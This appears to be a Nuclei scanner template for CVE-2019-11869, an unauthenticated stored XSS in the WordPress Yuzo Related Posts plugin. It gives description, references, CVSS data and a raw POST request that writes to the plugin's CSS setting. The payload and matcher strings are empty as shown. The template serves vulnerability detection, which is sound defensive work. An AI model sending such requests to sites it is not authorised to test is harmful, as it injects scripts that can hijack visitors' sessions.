id: CVE-2019-11869 info: name: WordPress Yuzo <5.12.94 - Cross-Site Scripting author: ganofins severity: medium description: | WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting because it mistakenly expects that is_admin() verifies that the request comes from an admin user (it actually only verifies that the request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability. reference: - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild - https://wpscan.com/vulnerability/9254 - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/ - https://wpvulndb.com/vulnerabilities/9254 - https://nvd.nist.gov/vuln/detail/CVE-2019-11869 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-11869 cwe-id: CWE-79 epss-score: 0.00218 epss-percentile: 0.597 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: yuzopro product: yuzo framework: wordpress tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro http: - raw: - | POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded yuzo_related_post_css_and_style= - | GET / HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_2, "")' - type: dsl dsl: - "contains(tolower(header_2), 'text/html')" # digest: 490a0046304402204d1e26a17c4c30a25c984812d74e5863ff9d46141c09b202bb77c1c5e95369a90220692d2ab1de65d05ad3b83a893a6eabc518043b83316e91e6225e9f63f2dcad03:922c64590222798bb761d5b6d8e72950